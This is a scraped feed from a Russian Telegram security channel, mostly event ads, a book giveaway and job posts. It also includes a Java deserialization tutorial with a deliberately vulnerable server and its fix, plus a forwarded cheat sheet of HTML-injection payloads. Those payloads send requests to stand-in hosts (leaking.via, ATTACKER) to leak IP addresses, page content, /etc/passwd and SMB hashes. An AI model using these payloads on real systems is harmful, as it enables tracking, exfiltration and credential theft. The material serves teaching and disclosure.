#вебинар #HR #найм #webinar
Кроме того, после вебинара желающие смогут получить бесплатную индивидуальную консультацию/разбор резюме от специалистов Offer, а самые мотивированные - Оффер в ИБ!
Сергей:
Этичный Хакер
Ведущий специалист по тестированию на проникновение
Играл за blue & red команды
Автор проекта Похек
Спикер OFFZONE 2024, Standoff Talks 2023
Ульяна:
Ведущий специалист по привлечению талантов компании F.A.C.C.T.
Занимается привлечением талантов в кибербез
Автор канала TechTalentRec
Настя:
Предприниматель в образовании
Преподаватель computer science
Основатель проекта «Offer»
Развивает soft skills и коммуникации в тех сфере
До встречи на вебинаре
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7🌚1
⚡️Разыгрываем 10 книг "Сети глазами хакера" (в бумажном варианте):
• В книге рассматриваются вопросы безопасности компьютерных сетей, что делает ее очень полезной для экспертов по сетевой безопасности, пентестерам и даже системным администраторам!
• Всего будет 10 призовых мест, а итоги подведем уже в следующую субботу (14.09 в 19:00) при помощи бота, который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на мой канал @poxek;
2. Подписаться на канал моих друзей @tg_infosec;
3. Нажать на кнопку «Участвовать».
#Конкурс
• В книге рассматриваются вопросы безопасности компьютерных сетей, что делает ее очень полезной для экспертов по сетевой безопасности, пентестерам и даже системным администраторам!
• Всего будет 10 призовых мест, а итоги подведем уже в следующую субботу (14.09 в 19:00) при помощи бота, который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на мой канал @poxek;
2. Подписаться на канал моих друзей @tg_infosec;
3. Нажать на кнопку «Участвовать».
#Конкурс
27🔥47 20👍14
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Опубликовали видеоролик о том, как прошла ежегодная независимая премия Pentest award 2024!
Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.
Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.
До встречи в 2025 году 👋
Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.
📺 Полное видео
🔗 Pentest award (архив)
❤ @justsecurity
Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.
Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.
До встречи в 2025 году 👋
Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.
Please open Telegram to view this post
VIEW IN TELEGRAM
Десятки, сотни, а может даже тысячи багхантеров изучают дисклознутые отчёты с разных платформ.
Юра aka circuit, ведёт классный side проект: Репорты простым языком @critical_bug
Рекомендую подписаться, т.к. этот канал захватила нейросеть и ведёт канал очень даже успешно.
Там вы прочитаете о раскрытых отчётах с h1, где простыми словами расписано о чем бага, сколько вечно зелёных за неё заплатили и какая критичность. Что делать с этой информацией я думаю и так понятно)
Так что подписывайтесь @critical_bug❤️
Юра aka circuit, ведёт классный side проект: Репорты простым языком @critical_bug
Рекомендую подписаться, т.к. этот канал захватила нейросеть и ведёт канал очень даже успешно.
Там вы прочитаете о раскрытых отчётах с h1, где простыми словами расписано о чем бага, сколько вечно зелёных за неё заплатили и какая критичность. Что делать с этой информацией я думаю и так понятно)
Так что подписывайтесь @critical_bug
Please open Telegram to view this post
VIEW IN TELEGRAM
Похек
Десятки, а может даже сотни безопасников, которые были на вебинаре. Только для вас! Сегодня и завтра проходят бесплатные карьерные консультации , на которых мы:
- определяем ваш запрос(куда хотите прийти и что останавливает),
- разбираем cv(резюме) с экспертами,
- обсуждаем roadmap,
- рассказываем, как получить оффер.
P.S. только для моих подписчиков, разрешают писать всем, даже тем кто не был)
Длительность 40-60 минут.
Запись: @aa_belova
- определяем ваш запрос(куда хотите прийти и что останавливает),
- разбираем cv(резюме) с экспертами,
- обсуждаем roadmap,
- рассказываем, как получить оффер.
P.S. только для моих подписчиков, разрешают писать всем, даже тем кто не был)
Длительность 40-60 минут.
Запись: @aa_belova
😁8👍7 5
Прошу прощения, что давно не было постов нормальных(
В скором времени выхожу в новую компанию и будет интересный контент)
А пока можете угадать куда 😁
Кто знает, не говорим)
В скором времени выхожу в новую компанию и будет интересный контент)
А пока можете угадать куда 😁
Кто знает, не говорим)
🌚16👍3🔥3 3⚡1
Forwarded from Борис_ь с ml (Boris Protoss)
Безопасность ML — фантазии, или реальность?
#иб_для_ml
Так много выходит статей про атаки на машинное обучение, фреймворки по MLSecOps возникают то тут, то там...
Но вот вопрос... "А был ли мальчик?" Есть ли действительно люди, которые пользуются методами проведения атак на искусственный интеллект? Выходит ли сегодня эта тема за рамки строгих математических кругов и лабораторных условий?
Спойлер- да .
Подробности в моей новой статьей на Хабре: https://habr.com/ru/articles/834800/
#иб_для_ml
Так много выходит статей про атаки на машинное обучение, фреймворки по MLSecOps возникают то тут, то там...
Но вот вопрос... "А был ли мальчик?" Есть ли действительно люди, которые пользуются методами проведения атак на искусственный интеллект? Выходит ли сегодня эта тема за рамки строгих математических кругов и лабораторных условий?
Спойлер
Подробности в моей новой статьей на Хабре: https://habr.com/ru/articles/834800/
Хабр
Безопасность ML — фантазии, или реальность?
Привет, Хабр! Я автор канала «Борис_ь с ml» , где рассказываю о том, как применяется машинное обучение в информационной безопасности, а также как защищать системы, в которых применяется машинное...
2🔥12
This media is not supported in your browser
VIEW IN TELEGRAM
UnderConf. От сообщества – для сообщества
Keynote-спикеры и докладчики крупных конференций, авторы ваших любимых телеграм-каналов про ИБ, ведущие самых известных воркшопов и легенды индустрии в одном месте – на UnderConf, 29.09
@crytech7, Сергей Голованов a.k.a. @sk1ks, @n0nvme и другие представят свои последние разработки и исследования, а Сергей Норд, локпикеры Autopsy Will Tell и хардварщики “Танец Роботов” параллельно проведут для вас топовые воркшопы
На конференции также будет развернута лаборатория Pentest Lab, где можно будет разобраться в сценариях различных атак на части сетевой инфраструктуры компании
В середине дня пройдут дебаты между Алексеем Гришиным и @i_bo0om о том, как расходятся интересы специалистов и бизнеса
🌚 Организаторы дали именной прокод для моих подписчиков: у него было 30 активаций, осталось уже меньше
Подробная программа уже доступна на сайте. Переходите, любуйтесь и покупайте билеты! До встречи на UnderConf 29.09 в 9:00, в Холидей Инн Сокольники по адресу г. Москва Русаковская ул., 24
Канал | Чат
Keynote-спикеры и докладчики крупных конференций, авторы ваших любимых телеграм-каналов про ИБ, ведущие самых известных воркшопов и легенды индустрии в одном месте – на UnderConf, 29.09
@crytech7, Сергей Голованов a.k.a. @sk1ks, @n0nvme и другие представят свои последние разработки и исследования, а Сергей Норд, локпикеры Autopsy Will Tell и хардварщики “Танец Роботов” параллельно проведут для вас топовые воркшопы
На конференции также будет развернута лаборатория Pentest Lab, где можно будет разобраться в сценариях различных атак на части сетевой инфраструктуры компании
В середине дня пройдут дебаты между Алексеем Гришиным и @i_bo0om о том, как расходятся интересы специалистов и бизнеса
POHEK100underconfPROMOKODEMEGAFUNПодробная программа уже доступна на сайте. Переходите, любуйтесь и покупайте билеты! До встречи на UnderConf 29.09 в 9:00, в Холидей Инн Сокольники по адресу г. Москва Русаковская ул., 24
Канал | Чат
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍6
Forwarded from КИБЕР МЕДИА
В эпоху стремительного развития искусственного интеллекта вопросы его безопасности выходят на первый план. Как защитить нейросети от атак, обеспечить этические рамки и разрабатывать безопасные системы с использованием ИИ?
Please open Telegram to view this post
VIEW IN TELEGRAM
😁14👍9 6
#java #deser #deserialization
Все мы когда-нибудь дорастаем до того момента, когда к нам на проекте попадется приложение на Java и вы в судорожном фаззинге случайно натыкаетесь на что-то непонятное, а это оказывается десериализация.
Но сначала надо разобраться, что такое сериализация. Это процесс преобразования объекта или структуры данных в последовательность байтов для хранения или передачи. Это позволяет сохранить состояние объекта и позже восстановить его.
Соответственно десериализация - обратный процесс, при котором последовательность байтов преобразуется обратно в объект или структуру данных.
Вот вам пример кода:
import java.io.*;
// Класс, который мы будем сериализовать
class User implements Serializable {
private static final long serialVersionUID = 1L;
private String name;
private int age;
public User(String name, int age) {
this.name = name;
this.age = age;
}
@Override
public String toString() {
return "User{name='" + name + "', age=" + age + "}";
}
}
public class SerializationExample {
public static void main(String[] args) {
// Создаем объект для сериализации
User user = new User("Sergey", 20);
// Сериализация
try (FileOutputStream fileOut = new FileOutputStream("user.ser");
ObjectOutputStream out = new ObjectOutputStream(fileOut)) {
out.writeObject(user);
System.out.println("Объект сериализован в файл user.ser");
} catch (IOException i) {
i.printStackTrace();
}
// Десериализация
User deserializedUser = null;
try (FileInputStream fileIn = new FileInputStream("user.ser");
ObjectInputStream in = new ObjectInputStream(fileIn)) {
deserializedUser = (User) in.readObject();
} catch (IOException i) {
i.printStackTrace();
} catch (ClassNotFoundException c) {
System.out.println("Класс User не найден");
c.printStackTrace();
}
if (deserializedUser != null) {
System.out.println("Десериализованный объект: " + deserializedUser);
}
}
}
Атака десериализации - это тип атаки, при котором злоумышленник манипулирует сериализованными данными, чтобы вызвать нежелательное поведение в приложении при их десериализации.
Вот пример уязвимого кода:
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
public class VulnerableServer {
public static void main(String[] args) {
try (ServerSocket serverSocket = new ServerSocket(1234)) {
System.out.println("Сервер запущен. Ожидание подключений...");
while (true) {
try (Socket clientSocket = serverSocket.accept();
ObjectInputStream ois = new ObjectInputStream(clientSocket.getInputStream())) {
// Уязвимый код: прямая десериализация без проверок
Object obj = ois.readObject();
System.out.println("Получен объект: " + obj);
} catch (Exception e) {
e.printStackTrace();
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
Уязвимость в строке:
javaCopyObject obj = ois.readObject();
Здесь происходит прямая десериализация объекта без каких-либо проверок. Это позволяет злоумышленнику отправить любой сериализованный объект, который будет десериализован и выполнен в контексте сервера. Подобный код может привести к RCE.
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥9👍1
Теперь поговорим о том, как защищаться от десериализации
Пример безопасного кода:
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.HashSet;
import java.util.Set;
public class SecureServer {
private static final Set<String> ALLOWED_CLASSES = new HashSet<>();
static {
ALLOWED_CLASSES.add("java.lang.String");
ALLOWED_CLASSES.add("java.util.ArrayList");
}
public static void main(String[] args) {
try (ServerSocket serverSocket = new ServerSocket(1234)) {
System.out.println("Сервер запущен. Ожидание подключений...");
while (true) {
try (Socket clientSocket = serverSocket.accept();
ObjectInputStream ois = new ObjectInputStream(clientSocket.getInputStream()) {
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!ALLOWED_CLASSES.contains(desc.getName())) {
throw new InvalidClassException("Недопустимый класс", desc.getName());
}
return super.resolveClass(desc);
}
}) {
Object obj = ois.readObject();
System.out.println("Получен объект: " + obj);
} catch (Exception e) {
e.printStackTrace();
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
Исправления:
ALLOWED_CLASSES).resolveClass для проверки классов перед десериализацией.Также есть другие практики по защите от десеров. К примеру Java SecurityManager, transient. С другой стороны вы можете закостылить защиту через сторонние библиотеки: SerialKiller, fastjson2, YamlBeans
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥11👍2 1
Forwarded from Хакер — Xakep.RU
OAuth от и до. Ищем цепочки уязвимостей при атаках на авторизацию #статьи #подписчикам
Сегодня разберем мисконфиги OAuth, которые встречаются в дикой природе и хоть сами по себе безобидны, в определенных условиях могут иметь серьезные последствия — вплоть до похека админских аккаунтов. В этой сатье я покажу, как искать такие цепочки уязвимостей.
https://xakep.ru/2024/09/13/oauth-vuln-chains/
Сегодня разберем мисконфиги OAuth, которые встречаются в дикой природе и хоть сами по себе безобидны, в определенных условиях могут иметь серьезные последствия — вплоть до похека админских аккаунтов. В этой сатье я покажу, как искать такие цепочки уязвимостей.
https://xakep.ru/2024/09/13/oauth-vuln-chains/
#ciso
Атаки вирусов-шифровальщиков остаются серьезной угрозой информационной безопасности компаний. От них не застрахованы даже корпорации с многоуровневыми системами защиты, целыми армиями ИБ-специалистов и арсеналами СЗИ.
Если корпоративная сеть подверглась такой атаке, ИБ-службе и CISO лучше поскорее подключить команду реагирования. Однако бизнес и штатные сотрудники службы безопасности могут самостоятельно снизить риск атак программ-вымогателей, дополнительно защитить критичные файлы и облегчить расследование, если избежать инцидента все же не удалось. Как именно? Рассказывает Семен Рогачев, руководитель отдела реагирования на инциденты Бастиона.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚5 2
Похек
⚡️Разыгрываем 10 книг "Сети глазами хакера" (в бумажном варианте): • В книге рассматриваются вопросы безопасности компьютерных сетей, что делает ее очень полезной для экспертов по сетевой безопасности, пентестерам и даже системным администраторам! • Всего…
🎉 Результаты розыгрыша:
Победители:
1. ooYa9ii (@Russian_OSlNT)
2. ALISHER (@megaumka)
3. Константин (@kr1pt0graf)
4. Babidshon (@BABIDSHON12)
5. Даниил (@by_dnk)
6. Алексей
7. Алексей (@lost_fany)
8. .Morty (@moortyyy)
9. Panteleevich (@Cracka1)
10. Anton (@TichoBrage)
Проверить результаты
Победители:
1. ooYa9ii (@Russian_OSlNT)
2. ALISHER (@megaumka)
3. Константин (@kr1pt0graf)
4. Babidshon (@BABIDSHON12)
5. Даниил (@by_dnk)
6. Алексей
7. Алексей (@lost_fany)
8. .Morty (@moortyyy)
9. Panteleevich (@Cracka1)
10. Anton (@TichoBrage)
Проверить результаты
🔥13👍5😁3
У тебя есть возможность поучаствовать в One Week Offer от крупнейшей технологической компании России - лидера инженерной индустрии.
Если ты хорошо знаешь принципы серверной архитектуры и СХД и хочешь стать частью масштабных проектов:
• Пришли своё резюме и заполни форму участия до 22 сентября.
• Пройди техническое интервью.
• Получи оффер после успешного собеседования.
Скорее переходи по ссылке, оставляй заявку и стань частью команды.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚11😁3
Forwarded from HaHacking
html5sec.org/test/#<1...149> ]Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузку
iframe'ов с различными DTD (HTML5, HTML4, XHTML);html5sec.org/test.<ext> ]Примеры файлов, содержащих полезную нагрузку для вызова
alert(1), со следующими расширениями:asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, svg, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip
Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных;
Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах
...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
<style>@import url(https://leaking.via/css-import-url);</style>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"><rect cursor="url(https://leaking.via/svg-cursor),auto" /></svg>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...
➖ [Chrome] Leak user html content using Dangling Markup injection when http upgrade to https▪️ ЧТО:<img src="http://ATTACKER/?q=▪️ КОГДА:HTTP➡️ HTTPSдляhttp://ATTACKER▪️ ИТОГ: утечка содержимого страницы➖ [Proton] User IP address leaked on email open▪️ ЧТО:<svg><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></svg>▪️ КОГДА: при открытии письма▪️ ИТОГ: утечкаIPадреса➖ [macOS] This man thought opening a txt file is fine, he thought wrong▪️ ЧТО:ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html>ℹ️ <iframedoc src="file:///etc/passwd">▪️ КОГДА: при открытииTXTфайла в TextEdit▪️ ИТОГ: DoS (например, подтянуть/dev/zero), утечкаIPадреса + содержимого локальных файлов (*объединить пейлоады)➖ [MS Outlook] SMB hash hijacking & user tracking▪️ ЧТО:<v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background>▪️ КОГДА: при открытии письма▪️ ИТОГ: внешниеSMB/WebDAVзапросы
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍18🔥5 3